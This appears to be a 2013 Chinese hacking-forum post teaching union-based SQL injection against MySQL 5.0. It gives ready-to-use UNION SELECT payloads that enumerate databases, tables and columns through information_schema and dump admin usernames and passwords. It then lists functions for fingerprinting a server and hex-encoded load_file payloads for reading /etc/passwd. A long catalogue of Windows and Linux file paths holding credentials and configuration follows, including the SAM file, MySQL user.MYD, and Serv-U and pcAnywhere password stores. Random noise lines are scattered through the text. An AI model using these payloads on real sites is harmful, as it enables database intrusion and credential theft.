中国网络渗透测试联盟

标题: mysql5.0注入原理 [打印本页]

---

作者: admin    时间: 2013-3-7 13:24
标题: mysql5.0注入原理
记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
& c+ l: f8 t  i
9 S. N" x; i/ H4 G/ w
! N$ l/ Q, w- S6 v
- X# M! v% q; g9 a" H0 CMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
3 n5 u* ?/ Z( R0 K. Z  D存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
7 ?5 k& l! ^0 H( Z& b. E  X明。
1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
! D. E1 B+ a+ c) F7 e|—字段：SCHEMA_NAME ->数据库名称

7 Z+ u! ]# Q" u- I8 v|TABLES ->存储表名
|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

. x( W" v1 W6 t8 F8 v' Q* j6 ?; s|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
8 Y) Z9 j. |, R( F2 q|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称

#########################################################################
##

0×001 获取系统信息:

  G. v, I: |% u/ C6 A6 e& V2 n1 runion select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

/*
% F0 a$ f* e7 a) a. I6 Q% k6 o
@@global.version_compile_os 获取系统版本
! d( m$ [! b. j* C3 _) z5 s0 ?
@@datadir 数据库路径
" o# x, a2 z* F! B5 Jdatabase() 当前数据库名称
6 O0 G# e( ^$ B! s0x3c62723e 换行HEX值
0 B, }, c1 z4 Q# e3 n! f5 L
*/
, M) V7 ?! k9 T+ |8 t* }5 g
######################################################################
) b" b- a* A! `6 f- a9 I3 y
& C3 r9 r' a# U, A: o. L; _0×002 获取表名

  _, t  K( X, w; i: D. J# Sunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from
6 S6 h2 D* n) z4 e" e9 I: B# |information_schema.tables where table_schema=0x67617264656e /*

: o) \! b0 [+ z, M# b; d/*
: ]) K7 W/ f* h; C8 I3 \/ ]
2 w3 s4 {$ ~/ \6 S" @+ t: P5 r. T0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

5 w* C' |; q7 Q0 E, R% }; a*/
, B/ r% H9 I3 b4 Y* G+ j
######################################################################

& W# n! q* s2 A3 j7 m0×003 获取字段
" M/ l' J2 |( O) \
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and


table_schema=0x67617264656e limit 1 /*
' E. c. M5 Q5 s9 S" A: ^! ?5 D
/*
+ ?# V  u! h4 M! [4 F; B3 P# a; d; K
' J8 K# T8 x+ h) J1 z( a) o3 ~8 q% ]$ sgroup_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
* m6 z5 G; T: \1 V& X/ g" v
& i$ @8 H1 f+ K) P8 }0x67617264656e ->数据库名
$ I+ ]' j- g2 m. }3 E, M
*/

#####################################################################

0×004 获取数据
- S' S4 Y2 W. E
( F3 N2 G. {$ S" u8 hunion select 1,2,3
7 d& F+ U" |* d& i3 }7 t' T. W,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin

union select 1,group_concat(id),group_concat(adname),4,5,group_concat
& C8 Y* c0 Q1 v; p) l(adpassword),6,7,8 from admin

/*

0x3c62723e 换行符号HEX编码
# C" A" C4 q5 i" G
  |! o6 m0 `" m# ~! W  Ggroup_concat 同时获得该字段所有数据

*/
9 U7 m5 f3 l  [8 L8 Y




顺便添加一些mysql注入时非常有用的一些东西
: z) V, z/ ~; h. [7 x
. h0 i$ w# f5 y& f! f- g' K& R简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
; Y: }! B9 I& Z3 h/ _' S2:user()        用户名
$ A( r& {7 g1 w% b3:current_user()  当前用户名
4:session_user()连接数据库的用户名
- n1 @# J$ g8 k8 X8 ^6 q5:database()    数据库名
6:version()     MYSQL数据库版本
/ Q: s% j# L2 ~: `) t0 ~. @7:load_file()   MYSQL读取本地文件的函数
7 f& t1 k! R8 Z, r1 S5 O: u# D8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
6 l0 S( \( n7 N* W/ Z6 T8 r4 }, U10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
WINDOWS下:
c:/boot.ini          //查看系统版本
0 u) d/ K% ]: a6 I. ]. ?' ^" k; N8 Gc:/windows/php.ini   //php配置信息
/ Z9 L7 c" K* e% c2 ec:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
$ Z. s4 V) N* a# X1 w* tc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
, Y" R% J! x5 Z4 H  E3 fc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
, ~" O" ]3 k4 [( o! pc:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
8 z$ Z( ^0 l3 `+ `& e4 Yc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
2 Z& I- B- c8 D* f. Uc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
0 @) W& |4 o0 e0 o0 A' y' |c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
" l" J4 [' U2 C( K& ec:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
' _) r5 }3 q  W+ v1 b9 u

& V) ]8 v  e' R; w# g/ Jc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
* n9 ]7 n/ J4 _6 d/ U  Wd:\APACHE\Apache2\conf\httpd.conf
6 Y% W: g9 Z3 f0 j: JC:\Program Files\mysql\my.ini
3 s% q8 e$ M8 L: Z# O1 t5 a9 _) p/ a, mc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
1 |/ b% Y3 ]2 [% P+ eC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

, m3 q" g* H# K: x% sLUNIX/UNIX下:
- h7 m0 D! I4 q( \5 D/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
9 L7 v6 e$ R4 c) ^# F5 z/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
! k( P- p6 {  L5 g* _5 Z7 d- d7 f" F/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
6 ^" X! A/ p6 s/ p. X/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
: a4 h, e8 }) r4 W. ~6 K/etc/issue
$ j! |3 N* g5 p1 n+ Y/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
1 w9 ^3 ^1 {! q+ r# x/ Q2 f; C$ D$ ]/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
; Q, w  ?: R7 U7 Z6 c/ T' q/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
) c& X  y+ {  E! D/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
; e) n: u5 T) V% O! z/ S/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
" t8 a) I+ F6 M. }) j2 ]7 T9 K8 H/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
; j4 T  M/ K1 ^+ h& n, \load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

! H$ Q2 l( Q. Z0 H- I

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2